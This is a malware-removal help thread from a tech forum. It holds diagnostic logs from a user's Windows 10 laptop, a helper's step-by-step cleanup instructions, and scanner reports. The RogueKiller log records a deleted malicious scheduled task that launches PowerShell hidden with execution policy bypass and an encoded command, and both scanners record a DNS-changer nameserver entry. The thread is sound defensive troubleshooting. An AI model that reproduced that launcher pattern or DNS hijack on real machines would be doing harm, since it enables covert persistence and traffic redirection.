HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{F2E7DD72-6468-4E36-B6F1-6488F42C1B52} => ""="Firmware"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SpbCx.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\uefi.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{F2E7DD72-6468-4E36-B6F1-6488F42C1B52} => ""="Firmware"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\windows\img0.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run: => "Classic Start Menu"
HKLM\...\StartupApproved\Run: => "Yoga PhoneCompanion"
HKLM\...\StartupApproved\Run: => "Yoga Picks"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "Lenovo App Shop"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\Run: => "AirDroid 3"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_D61B85333F3CD95B073389B3076505BE"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\Run: => "OneDrive"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [WirelessDisplay-Infra-In-TCP] => (Allow) %systemroot%\system32\CastSrv.exe
FirewallRules: [UDP Query User{47BE3932-400F-49D0-983D-B4D7CED199B5}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe
FirewallRules: [TCP Query User{2AA3B6D0-E876-458B-BE9E-81C10DE06741}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe
FirewallRules: [UDP Query User{CE49CF93-0EC8-404F-9790-90157F4F923A}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\astudycachemgr.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\astudycachemgr.exe
FirewallRules: [TCP Query User{B1056847-28B0-48DD-9F41-8948B38D2E44}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\astudycachemgr.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\astudycachemgr.exe
FirewallRules: [UDP Query User{BB893E07-8667-4F69-BC72-936B06D0CC54}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe
FirewallRules: [TCP Query User{C5B0DE44-2C65-4567-AE9B-1C023CFDCD8D}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe
FirewallRules: [UDP Query User{C73A393A-FC2C-46DA-B962-BA7AB67F320C}C:\users\007\appdata\locallow\amicas\v6cdviewer\privatejre\bin\armiregistry.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\privatejre\bin\armiregistry.exe
FirewallRules: [TCP Query User{33A133CD-7086-4E7B-870A-2B14E043A99D}C:\users\007\appdata\locallow\amicas\v6cdviewer\privatejre\bin\armiregistry.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\privatejre\bin\armiregistry.exe
FirewallRules: [{516EB7FE-6646-4875-9FBE-33EF828D56EA}] => (Allow) C:\Program Files\CyberLink\PowerDirector10\PDR10.EXE
FirewallRules: [{B765F9AF-C656-4870-8DBF-E1A1610395FC}] => (Allow) C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\ismagent.exe
FirewallRules: [{AE3F85E6-7C30-4752-ABE8-1A8A54E50F1A}] => (Allow) C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\ismloader.exe
FirewallRules: [{7B69B2F9-AC3D-4CBD-B736-1A14454C0487}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{E68E90BB-1E71-4B56-A19F-AFF0749F5A20}] => (Allow) LPort=5556
FirewallRules: [{45BEF83D-8143-48C8-B84E-E557BC50AC22}] => (Allow) LPort=5558
FirewallRules: [{7DBD2BFE-720F-4137-BEEA-BADB6978843F}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{414A6F28-8A4C-4426-9508-C8BE1D4D185B}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{5B869AB7-31F0-40C9-876C-5AF444350236}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{EA04E2D7-B327-465A-81F5-6721123D5517}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [TCP Query User{A3359ECA-A83E-41A9-9B8B-77DE98654F79}C:\program files (x86)\globalscape\cuteftp 8 professional\ftpte.exe] => (Allow) C:\program files (x86)\globalscape\cuteftp 8 professional\ftpte.exe
FirewallRules: [UDP Query User{90C32855-6548-4E45-A1AF-CC4AE6DC4286}C:\program files (x86)\globalscape\cuteftp 8 professional\ftpte.exe] => (Allow) C:\program files (x86)\globalscape\cuteftp 8 professional\ftpte.exe
FirewallRules: [{FECE8818-A771-4FDA-905C-419E61216C65}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{390B1ED0-CE02-4ED4-A6AB-4ED9187286E0}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{5ADCC88B-B82B-4B81-A0A4-8DB21A184AAA}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{4678A2EF-F88A-4DE7-83E2-3C868E4F1D01}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{2E06CFC3-8191-483D-9076-8C299A7D7A79}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{5E021D0C-B7B1-447D-9CDD-7FF91B92031D}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{BDFB7139-F650-459B-AB9F-BA35F0DBDE99}C:\program files (x86)\airdroid\airdroid.exe] => (Allow) C:\program files (x86)\airdroid\airdroid.exe
FirewallRules: [UDP Query User{AABB846D-16B2-4CB4-AE17-7707A831FC40}C:\program files (x86)\airdroid\airdroid.exe] => (Allow) C:\program files (x86)\airdroid\airdroid.exe
FirewallRules: [{BB3DDC02-D438-4562-BA16-342AA5CB6B5A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{49B8014D-F79F-4303-993D-4600006F699B}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{66155D70-C2E6-4DEE-8D29-228F17E9836A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{65D8FD47-7254-4DB8-ACBB-9ACD1D86E8E8}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{EC4EC18B-13C0-458E-BF21-053751AE1308}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{1118C594-EF00-4EBE-AA6D-ECBDE8BBBCB1}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{7059AB57-640C-47F0-AA0A-4A015998E125}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{9D507AF1-1103-4731-92A4-0D4A4E8A2FE9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{0C757126-CD26-4759-9E0B-F8CF62A2B334}] => (Allow) C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe
FirewallRules: [{ABD8F192-50BE-4791-88AC-38C60F6E496D}] => (Allow) C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe
FirewallRules: [{4D940F22-3D13-4CEB-8209-043E6C25AF44}] => (Allow) C:\Program Files (x86)\VPN Unlimited\openvpn.exe
FirewallRules: [{CC40EEEB-1E6C-4DB9-BB3B-0E47496D03D5}] => (Allow) C:\Program Files (x86)\VPN Unlimited\openvpn.exe
FirewallRules: [{9FFCB36C-A2FB-44C8-BD59-729C5D8E8C87}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{679CC4F7-02A9-44CD-AC16-6858A0499AA5}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{B58A077D-ACFE-4A10-AC6C-62F5B29BEA7A}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{7603E194-FCBB-42BB-8112-8E5A2C8DB032}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{F192D31A-4726-452D-80E6-FC24D410BC22}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{200C029E-CFF4-4EA4-B1ED-BD183B276F39}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (03/02/2017 10:13:59 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"1".Error in manifest or policy file "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"2" on line UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"3.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="15.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (03/01/2017 05:37:40 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (03/01/2017 04:37:54 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1203

Error: (03/01/2017 04:37:54 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 1203

Error: (03/01/2017 04:37:54 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (03/01/2017 02:19:01 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"1".Error in manifest or policy file "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"2" on line UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"3.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="15.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (03/01/2017 06:00:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1140

Error: (03/01/2017 06:00:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 1140

Error: (03/01/2017 06:00:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (02/28/2017 06:51:03 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"1".Error in manifest or policy file "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"2" on line UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"3.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="15.0.0.0".
Please use sxstrace.exe for detailed diagnosis.


System errors:
=============
Error: (03/03/2017 04:50:53 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 04:50:53 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 04:50:52 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 04:49:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The BstHdDrv service failed to start due to the following error:
%%2

Error: (03/03/2017 04:48:56 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 03:57:12 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 12:27:33 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}

Error: (03/03/2017 12:25:20 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073d02: Microsoft Sticky Notes.

Error: (03/03/2017 12:24:35 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 12:24:35 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable


CodeIntegrity:
===================================
Date: 2016-11-28 20:31:52.646
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-11-28 20:31:52.621
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-09-25 21:36:08.416
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.403
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.392
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.382
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.367
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.358
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.346
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.337
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-4500U CPU @ 1.80GHz
Percentage of memory in use: 37%
Total physical RAM: 8104.27 MB
Available physical RAM: 5097.37 MB
Total Virtual: 11101.28 MB
Available Virtual: 7931.88 MB

==================== Drives ================================

Drive c: (Windows8_OS) (Fixed) (Total:220.47 GB) (Free:3.19 GB) NTFS
Drive d: (LENOVO) (Fixed) (Total:4 GB) (Free:3.95 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 238.5 GB) (Disk ID: 8061B931)

Partition: GPT.

==================== End of Addition.txt ============================
 
You have a history of starting a topic in this forum and then you abandon it.
Since the last time it happened was a few years ago, I'll give you one more chance.
If it happens again you won't be getting any more help from me.


Please observe the following rules:
  • Read all of my instructions very carefully. Your mistakes during the cleaning process may have very serious consequences, like an unbootable computer.
  • If you're stuck, or you're not sure about a certain step, always ask before doing anything else.
  • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
  • Never run more than one scan at a time.
  • Keep updating me regarding your computer behavior, good, or bad.
  • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
  • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in the malware removal forum.
  • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.

========================================

Download RogueKiller from one of the following links and save it to your Desktop:

Link 1
Link 2
  • Close all the running programs
  • Double-click the downloaded setup.exe file to install the program.
  • Click on Start Scan button.
  • Click on another Start Scan button.
  • Wait until the Status box shows Scan Finished
  • Click on Delete.
  • Wait until the Status box shows Deleting Finished.
  • Click on Report and copy/paste the content of the Notepad into your next reply.
  • RKreport.txt could also be found on your desktop.
  • If more than one log is produced post all logs.
Please download Malwarebytes to your desktop.
  • Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
  • Then click Finish.
  • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
  • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
  • When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
  • Restart your computer when prompted to do so.
  • The scan log is available through History -> Application logs. Please post its contents in your next reply.
Please download AdwCleaner by Xplode and save to your Desktop.
  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator
  • The tool will start to update the database if one is required.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Logfile button.
  • A window will open which lists the logs of your scans.
  • Click on the Scan tab.
  • Double-click the most recent scan which will be at the top of the list....the log will appear.
  • Review the results...see note below
  • After reviewing the log, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
  • To open a Cleaning log, launch AdwCleaner, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
  • Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
  • A copy of all logfiles is saved to C:\AdwCleaner.
-- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.


Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista or Seven, right-mouse click it and select Run as Administrator.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
 
After running this program there were several items deleted. Also after it finished it became harder to access TechSpot and to press the download links. It caused a pop-up saying I have a virus every time. I got Malwarebytes and the other programs downloaded using incognito mode. I will post the rest of the logs accordingly.

RogueKiller V12.9.9.0 (x64) [Feb 27 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 10 (10.0.14393) 64 bits version
Started in : Normal mode
User : 007 [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Delete -- Date : 03/03/2017 18:50:35 (Duration : 00:23:16)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 6 ¤¤¤
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564 -> Deleted
[PUM.Proxy] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\NlaSvc\Parameters\Internet\ManualProxies | (default) : -> Deleted
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-3283718265-1983809055-1317204610-1001\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://lenovo13.msn.com/?pc=LCJB -> Replaced (http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome)
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-3283718265-1983809055-1317204610-1001\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://lenovo13.msn.com/?pc=LCJB -> Replaced (http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome)
[Adw.DNSUnlocker] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{233b3be6-3a13-4215-9df0-79c7b19ef857} | DHCPNameServer : 82.163.143.176 ([GB]) -> Replaced ()
[Adw.DNSUnlocker] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{9ec270b1-c6a4-454b-bfbf-ee40f8d875f6} | DHCPNameServer : 82.163.143.176 ([GB]) -> Replaced ()

¤¤¤ Tasks : 2 ¤¤¤
[Mal.Powershell] \{0D080447-7F09-0979-0F11-050B0F0D110D} -- C:\windows\system32\WindowsPowershell\v1.0\powershell.exe (-nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand [encoded payload not preserved]) -> Deleted
[Suspicious.Path|Tr.Gen1] \{8A254196-3D8E-F63D-E565-AD7C49709C85} -- C:\ProgramData\{5072ACE0-E7D9-1B4B-3712-1D14D15C2594}\D66BD8CC-61C0-6F67-DF41-48BB72D20D63.exe (/run) -> Deleted

¤¤¤ Files : 1 ¤¤¤
[Tr.Gen0][File] C:\Users\007\AppData\Local\Temp\a.txt -> Deleted

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 2 ¤¤¤
[PUP.Gen0][Chrome:Addon] Default : Shortcuts for Google? [baohinapilmkigilbbbcccncoljkdpnd] -> Deleted
[PUP.Gen1][Chrome:Config] Default [SecurePrefs] : session.startup_urls [http://www.google.com/ig|http://sea...FIk0FA1oDB0VXfV5bFElXTwhwJVhKAlEgVFxAK3JWDk4=] -> Deleted

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: SAMSUNG MZMTD256HAGM-000L1 +++++
--- User ---
[MBR] 1ce281d9a91db9cd6964330fd9786dd3
[BSP] a323428ca19b553785feb26e6406398b : Empty|VT.Unknown MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 1000 MB
1 - [SYSTEM][MAN-MOUNT] EFI system partition | Offset (sectors): 2050048 | Size: 260 MB
2 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2582528 | Size: 1000 MB
3 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 4630528 | Size: 128 MB
4 - Basic data partition | Offset (sectors): 4892672 | Size: 225763 MB
5 - Basic data partition | Offset (sectors): 467255296 | Size: 4096 MB
6 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 475643904 | Size: 11950 MB
User = LL1 ... OK
User = LL2 ... OK
 
So I ran Malwarebytes, quarantined the items (that was the only option, no remove option) and restarted the computer after it finished as it suggested. (You can ignore the rest of this paragraph.) When I tried to log back on, it would not log me into my account. It created a temporary default account. It said any changes I make to the temporary account will get deleted... I don't know if that means if I create a txt document and then restart and that gets deleted or any corrections I do to improve my situation get deleted. All my files are still on my drive, but I'm not on my user account. I got a message that said if you sign out and sign back in it should fix the issue. It did not fix the issue. I even restarted the computer. I am now debating if I should continue with the rest of the scans.

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 3/3/17
Scan Time: 8:02 PM
Logfile: malwarebytes.txt
Administrator: Yes

-Software Information-
Version: 3.0.6.1469
Components Version: 1.0.75
Update Package Version: 1.0.1422
License: Trial

-System Information-
OS: Windows 10
CPU: x64
File System: NTFS
User: Shivang\007

-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 411591
Time Elapsed: 2 min, 58 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 3
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E, Quarantined, [46], [260247],1.0.1422
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E, Quarantined, [46], [260247],1.0.1422
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{ea2cb491}, Quarantined, [46], [260250],1.0.1422

Registry Value: 3
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{ea2cb491}|1, Quarantined, [46], [260250],1.0.1422
Trojan.DNSChanger.ACMB2, HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{9ec270b1-c6a4-454b-bfbf-ee40f8d875f6}|NameServer, Quarantined, [7700], [260227],1.0.1422
Trojan.DNSChanger.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\INTERFACES\{233b3be6-3a13-4215-9df0-79c7b19ef857}|NAMESERVER, Quarantined, [7700], [260227],1.0.1422

Registry Data: 14
